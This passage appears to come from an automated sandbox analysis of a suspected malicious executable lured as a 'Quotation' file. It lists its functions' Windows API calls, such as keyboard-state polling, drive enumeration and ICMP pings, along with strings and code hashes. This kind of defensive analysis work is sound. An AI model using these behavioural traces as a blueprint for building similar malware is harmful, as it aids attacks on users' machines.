IsWindow.USER32 ref: 009752F1
EndDialog.USER32(00000000), ref: 00975302

Strings

BUTTON, xrefs: 00975280

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: cf037b2c27c9584fd1cc57f22b1f0b3803aaec9d9899c9c97fa52561844ed5a4
Instruction ID: f7dbaae63cb7bfb9cbd68127b806887bffef47f748264ed177cf6d70ec466308
Opcode Fuzzy Hash: cf037b2c27c9584fd1cc57f22b1f0b3803aaec9d9899c9c97fa52561844ed5a4
Instruction Fuzzy Hash: A021F67226D704AFE7005BB4FC98B29BB6EEB84346F014426F509C1171DBB19C90BB23

Function 0097D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00919997: __itow.LIBCMT ref: 009199C2
Part of subcall function 00919997: __swprintf.LIBCMT ref: 00919A0C

CoInitialize.OLE32(00000000), ref: 0097D855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0097D8E8
SHGetDesktopFolder.SHELL32(?), ref: 0097D8FC
CoCreateInstance.OLE32(009A2D7C,00000000,00000001,009CA89C,?), ref: 0097D948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0097D9B7
CoTaskMemFree.OLE32(?,?), ref: 0097DA0F
_memset.LIBCMT ref: 0097DA4C
SHBrowseForFolderW.SHELL32(?), ref: 0097DA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0097DAAB
CoTaskMemFree.OLE32(00000000), ref: 0097DAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0097DAE9
CoUninitialize.OLE32(00000001,00000000), ref: 0097DAEB

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 8d8c3e8ac7db70938906938b23ec2423d50445af05b5b0a7e5fc8889d9eab838
Instruction ID: c728d86aca7d369b512db3a00569705d82d02d3ec134bfc636566e4384166c4a
Opcode Fuzzy Hash: 8d8c3e8ac7db70938906938b23ec2423d50445af05b5b0a7e5fc8889d9eab838
Instruction Fuzzy Hash: 8BB1FD75A00109AFDB04DFA4C899EAEBBF9FF89304B148469F509EB261DB30ED41CB51

Function 0097052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 009705A7
SetKeyboardState.USER32(?), ref: 00970612
GetAsyncKeyState.USER32(000000A0), ref: 00970632
GetKeyState.USER32(000000A0), ref: 00970649
GetAsyncKeyState.USER32(000000A1), ref: 00970678
GetKeyState.USER32(000000A1), ref: 00970689
GetAsyncKeyState.USER32(00000011), ref: 009706B5
GetKeyState.USER32(00000011), ref: 009706C3
GetAsyncKeyState.USER32(00000012), ref: 009706EC
GetKeyState.USER32(00000012), ref: 009706FA
GetAsyncKeyState.USER32(0000005B), ref: 00970723
GetKeyState.USER32(0000005B), ref: 00970731

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 0f8bab542d5005f16655c4238007d71042bce1e8a76e680d3b0695eb9072a63e
Instruction ID: 99826a55a0427420e3281906626e3e0182925355a28181dccf53f3a989335f20
Opcode Fuzzy Hash: 0f8bab542d5005f16655c4238007d71042bce1e8a76e680d3b0695eb9072a63e
Instruction Fuzzy Hash: 0D510E22A047845AFB34DBB488557EABFB89F81340F08C59ED5CA5B1C2DA549B4CCF52

Function 0096C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0096C746
GetWindowRect.USER32(00000000,?), ref: 0096C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0096C7B6
GetDlgItem.USER32(?,00000002), ref: 0096C7C1
GetWindowRect.USER32(00000000,?), ref: 0096C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0096C827
GetDlgItem.USER32(?,000003E9), ref: 0096C835
GetWindowRect.USER32(00000000,?), ref: 0096C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0096C889
GetDlgItem.USER32(?,000003EA), ref: 0096C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0096C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 0096C8C1

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 2f035af57ca808d6f9d826c7aaed9af2886b6357cc559b5eb11823fc2277692e
Instruction ID: c06120c4bdecd859cda43ccb062fa59a154cf7929dc4250954603824964867db
Opcode Fuzzy Hash: 2f035af57ca808d6f9d826c7aaed9af2886b6357cc559b5eb11823fc2277692e
Instruction Fuzzy Hash: B0512EB1B10209ABDB18CFADDD99AAEBBBAEB88311F14812DF515D7290D7709D408B50

Function 0091201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00911B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00912036,?,00000000,?,?,?,?,009116CB,00000000,?), ref: 00911B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009120D3
KillTimer.USER32(-00000001,?,?,?,?,009116CB,00000000,?,?,00911AE2,?,?), ref: 0091216E
DestroyAcceleratorTable.USER32(00000000), ref: 0094BEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009116CB,00000000,?,?,00911AE2,?,?), ref: 0094BF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009116CB,00000000,?,?,00911AE2,?,?), ref: 0094BF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009116CB,00000000,?,?,00911AE2,?,?), ref: 0094BF5A
DeleteObject.GDI32(00000000), ref: 0094BF6C

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 4930770a0edfd982bffc0ef9427a436e1a751276556a3f0ffb0c35f782e4fe6f
Instruction ID: 8c4303987bb471807cbb5aa6837f05d9c6cfa21b6185761cfcd3037cc4019120
Opcode Fuzzy Hash: 4930770a0edfd982bffc0ef9427a436e1a751276556a3f0ffb0c35f782e4fe6f
Instruction Fuzzy Hash: D461BC30219708EFCB35EF18DD48B69B7F5FB44312F10896AE14286960C779A8E4EF90

Function 009121A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 009125DB: GetWindowLongW.USER32(?,000000EB), ref: 009125EC

GetSysColor.USER32(0000000F), ref: 009121D3

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 0cd1b931b9ccb5c1637a8e5bcde137ea9a2144c8e572b26ec2863933c829f36e
Instruction ID: f2297ac95a9f9b9ca174f3c63ee209698085471b09fc507ee6bc47342fff9aa5
Opcode Fuzzy Hash: 0cd1b931b9ccb5c1637a8e5bcde137ea9a2144c8e572b26ec2863933c829f36e
Instruction Fuzzy Hash: 4D41A5312081449FDB296F28DC58BFD3769EB06331F184666FD758A1E2C7318C92EB51

Function 0097AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0099F910), ref: 0097AB76
GetDriveTypeW.KERNEL32(00000061,009CA620,00000061), ref: 0097AC40
_wcscpy.LIBCMT ref: 0097AC6A

Strings

removable, xrefs: 0097ABA8
ramdisk, xrefs: 0097ABEA
unknown, xrefs: 0097AC01
all, xrefs: 0097AB7C
cdrom, xrefs: 0097AB92
network, xrefs: 0097ABD4
fixed, xrefs: 0097ABBE

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: c19bc6343bf6a3d91ad963bbc433d7c23cd30782926864b8982959feb404b405
Instruction ID: 455900cf783840363aafaed8364bc722be1f93eabe3823341bb0e6e5b5acd45e
Opcode Fuzzy Hash: c19bc6343bf6a3d91ad963bbc433d7c23cd30782926864b8982959feb404b405
Instruction Fuzzy Hash: 47517D326583059BC720EF54C891BAEB7E9EFC4304F54882DF49A972E2DB319D49CA53

Function 00919997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 009199C2
__swprintf.LIBCMT ref: 00919A0C
__i64tow.LIBCMT ref: 0094FA0F

Strings

True, xrefs: 0094F9D0
%.15g, xrefs: 00919A06
False, xrefs: 0094F9D7
0x%p, xrefs: 0094F9F1

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: ac3f83e03d4beaf11c34e731b88736bf94f199afc7d4f922bf74dad0b2a7e235
Instruction ID: fd17c960043ed482bd82123316a4524ee682c51ad84e517a361632e84f869a62
Opcode Fuzzy Hash: ac3f83e03d4beaf11c34e731b88736bf94f199afc7d4f922bf74dad0b2a7e235
Instruction Fuzzy Hash: FB41097160420AAFDB24DF38DC52FBA73E8EF84304F20486EE549D7291EA759D81CB11

Function 009973C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009973D9
CreateMenu.USER32 ref: 009973F4
SetMenu.USER32(?,00000000), ref: 00997403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00997490
IsMenu.USER32(?), ref: 009974A6
CreatePopupMenu.USER32 ref: 009974B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009974DD
DrawMenuBar.USER32 ref: 009974E5

Strings

F, xrefs: 009974D1
0, xrefs: 009973CF

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 613a9fd4083f7885ca38c88588cf60f373649d6102e6077071f65d789fa7e3a6
Instruction ID: 69959cc91e6ba85edb1fdb555a49563ad4334d51ffe2f603b7a6000b47a24eed
Opcode Fuzzy Hash: 613a9fd4083f7885ca38c88588cf60f373649d6102e6077071f65d789fa7e3a6
Instruction Fuzzy Hash: F6415674A15209EFDF20DFA8D884AAABBFAFF49300F144429F95597361DB31A910DF50

Function 0099772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009977CD
CreateCompatibleDC.GDI32(00000000), ref: 009977D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009977E7
SelectObject.GDI32(00000000,00000000), ref: 009977EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 009977FA
DeleteDC.GDI32(00000000), ref: 00997803
GetWindowLongW.USER32(?,000000EC), ref: 0099780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00997821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0099782D

Strings

static, xrefs: 00997765

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 60ad4d21ac3235d07519b4716bdf6ef3fdc9d50137f590cf04772e7b6bf61b6b
Instruction ID: 19268c6bc97831a1404fabe6647d544bbf5973c490299c60a8ab3765dfa82fb1
Opcode Fuzzy Hash: 60ad4d21ac3235d07519b4716bdf6ef3fdc9d50137f590cf04772e7b6bf61b6b
Instruction Fuzzy Hash: 1231B032119219BBDF115FA8DC48FDA7B6DFF09320F100225FA15D20A0CB31D821EBA0

Function 00937040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0093707B

Part of subcall function 00938D68: __getptd_noexit.LIBCMT ref: 00938D68

__gmtime64_s.LIBCMT ref: 00937114
__gmtime64_s.LIBCMT ref: 0093714A
__gmtime64_s.LIBCMT ref: 00937167
__allrem.LIBCMT ref: 009371BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009371D9
__allrem.LIBCMT ref: 009371F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0093720E
__allrem.LIBCMT ref: 00937225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00937243
__invoke_watson.LIBCMT ref: 009372B4

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: 5e2a011b0c482dbae7975d0da2508d382e4843edf9d206586a3c85a52d40905c
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: 4571DCB1A04717ABD7249EB9CC81B5BF3A9AF55324F14422AF924E7681E770D9408F90

Function 00972A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00972A31
GetMenuItemInfoW.USER32(009D6890,000000FF,00000000,00000030), ref: 00972A92
SetMenuItemInfoW.USER32(009D6890,00000004,00000000,00000030), ref: 00972AC8
Sleep.KERNEL32(000001F4), ref: 00972ADA
GetMenuItemCount.USER32(?), ref: 00972B1E
GetMenuItemID.USER32(?,00000000), ref: 00972B3A
GetMenuItemID.USER32(?,-00000001), ref: 00972B64
GetMenuItemID.USER32(?,?), ref: 00972BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00972BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00972C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00972C24

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 870e8cddfd2426eab47eeb69e76d1bdef3de2bfc0470e514c3abe1b037e2c7da
Instruction ID: ae755d636dcf01402f49d4cdf46fb705d57ac3bce60640faf30c3d6380d2a3de
Opcode Fuzzy Hash: 870e8cddfd2426eab47eeb69e76d1bdef3de2bfc0470e514c3abe1b037e2c7da
Instruction Fuzzy Hash: BE61D2B2924249AFDB21CF64CC89EBEBBBCEB41304F14849AF845D7251D731AD45EB21

Function 00997192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00997214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00997217
GetWindowLongW.USER32(?,000000F0), ref: 0099723B
_memset.LIBCMT ref: 0099724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0099725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009972D6

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: f40c69df70f901360dc1ccc0d1fef7b856a8046f1779b445f4c741051401ef06
Instruction ID: 9dfad0e48d5e63c59dac2de2b6f67e45c9d43e34a15a19d3287ee9eddeda26ab
Opcode Fuzzy Hash: f40c69df70f901360dc1ccc0d1fef7b856a8046f1779b445f4c741051401ef06
Instruction Fuzzy Hash: 01617E71A14208AFDB10DFA8CC81EEEB7F8EB49710F14415AFA14E72A1D774AD45DB60

Function 0096710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00967135
SafeArrayAllocData.OLEAUT32(?), ref: 0096718E
VariantInit.OLEAUT32(?), ref: 009671A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 009671C0
VariantCopy.OLEAUT32(?,?), ref: 00967213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00967227
VariantClear.OLEAUT32(?), ref: 0096723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00967249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00967252
VariantClear.OLEAUT32(?), ref: 00967264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0096726F

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: a0d05465fb4997c576e69b8adad4ba2cd1677bf969c5ac15d418d8302d56daff
Instruction ID: 8d21f742f11b0fafe22a441ba2aa63240bb4088782d9c83ed1cae009e32c0350
Opcode Fuzzy Hash: a0d05465fb4997c576e69b8adad4ba2cd1677bf969c5ac15d418d8302d56daff
Instruction Fuzzy Hash: EF414235A04119AFCF00DFA8D858AEEFBB9FF48354F008069F955E7261DB30A945DB90

Function 00985A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00985AA6
inet_addr.WSOCK32(?,?,?), ref: 00985AEB
gethostbyname.WSOCK32(?), ref: 00985AF7
IcmpCreateFile.IPHLPAPI ref: 00985B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00985B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00985B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00985C00
WSACleanup.WSOCK32 ref: 00985C06

Strings

Ping, xrefs: 00985B29

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 378978328b746cf55d9c2db84ad2c85f7c973984f551e18baba0d1f9772f5789
Instruction ID: e476832feab6e7e360181804b768fceecf460158d262f098c6b84fde83870343
Opcode Fuzzy Hash: 378978328b746cf55d9c2db84ad2c85f7c973984f551e18baba0d1f9772f5789
Instruction Fuzzy Hash: A3517D316087009FDB20AF24CC95B6ABBE4EF88710F15892AF596DB2A1DB74EC44DB51

Function 0097B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0097B73B
